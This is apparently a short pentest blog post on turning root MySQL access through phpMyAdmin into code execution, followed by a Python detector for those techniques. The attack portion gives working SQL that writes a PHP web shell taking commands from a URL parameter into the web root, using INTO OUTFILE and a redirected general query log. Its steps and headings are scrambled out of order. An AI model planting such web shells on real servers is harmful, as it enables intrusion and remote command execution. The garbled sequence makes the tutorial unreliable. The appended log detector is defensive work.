Phpmyadmin Hacktricks Apr 2026

Published by: Security Tinkerer Reading time: 6 minutes

SET GLOBAL general_log = 'ON';
SET GLOBAL general_log_file = '/var/www/html/hack.php';
SELECT '<?php phpinfo(); ?>';

Now, visiting http://target.com/hack.php executes your code. This is loud but extremely effective.

You have root MySQL access, but you are a low-privilege OS user. How do we escalate?

MySQL needs write permissions to that OS folder, and SELinux/AppArmor usually hates this.

3. When INTO OUTFILE Fails: The Log File Hijack

Modern setups block outfile. But we have a Plan B: General Query Log.

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php";

Boom. You now have a web shell.

We compile a MySQL extension (UDF) that runs OS commands.
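For the defending side, the three techniques above (INTO OUTFILE, redirecting general_log_file, and loading a UDF) each leave a distinctive statement in query or audit logs. The following is an added example, not code from the original post: a small detector that flags those statements and rates a file write as high severity when it lands in a web-served directory or has a script extension. The web roots, extension list, function names and sample log lines are assumptions constructed for illustration.

```python
import re

# Assumptions: web-served directories and script extensions for this host.
WEB_ROOTS = ("/var/www/", "/usr/share/nginx/", "/srv/http/")
SCRIPT_EXT = (".php", ".phtml", ".phar")

# Each rule captures the file path the statement writes to or loads from.
RULES = [
    ("general_log_redirect", re.compile(
        r"SET\s+GLOBAL\s+general_log_file\s*=\s*['\"]([^'\"]+)['\"]", re.I)),
    ("into_outfile", re.compile(
        r"INTO\s+(?:OUT|DUMP)FILE\s+['\"]([^'\"]+)['\"]", re.I)),
    ("udf_load", re.compile(
        r"CREATE\s+(?:AGGREGATE\s+)?FUNCTION\s+\S+\s+RETURNS\s+\w+"
        r"\s+SONAME\s+['\"]([^'\"]+)['\"]", re.I)),
]

def classify(statement):
    """Return (rule, path, severity) for a risky statement, or None."""
    for rule, rx in RULES:
        m = rx.search(statement)
        if m is None:
            continue
        path = m.group(1)
        low = path.lower()
        risky = low.startswith(WEB_ROOTS) or low.endswith(SCRIPT_EXT)
        # Loading a shared library is always worth an alert; file writes are
        # "high" only when they land where the web server would run them.
        severity = "high" if rule == "udf_load" or risky else "review"
        return rule, path, severity
    return None

def scan(lines):
    """Return [(line_no, rule, path, severity)] for every flagged line."""
    hits = []
    for no, line in enumerate(lines, 1):
        hit = classify(line)
        if hit:
            hits.append((no, *hit))
    return hits

# Constructed general-query-log lines (not captured from a real server).
SAMPLE = [
    "2026-04-02T10:01:07Z 41 Query SELECT id FROM shop.orders WHERE id = 7",
    "2026-04-02T10:01:09Z 41 Query SET GLOBAL general_log_file = '/var/www/html/hack.php'",
    "2026-04-02T10:02:11Z 41 Query SELECT 'x' INTO OUTFILE '/var/www/html/shell.php'",
    "2026-04-02T10:03:30Z 12 Query SET GLOBAL general_log_file = '/var/lib/mysql/db01.log'",
    "2026-04-02T10:04:02Z 12 Query CREATE FUNCTION f RETURNS STRING SONAME 'lib_example.so'",
]
```

Calling scan(SAMPLE) returns one tuple per flagged line; the "review" severity marks a log redirect or export to a non-web path that may be legitimate administration but should still be confirmed.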
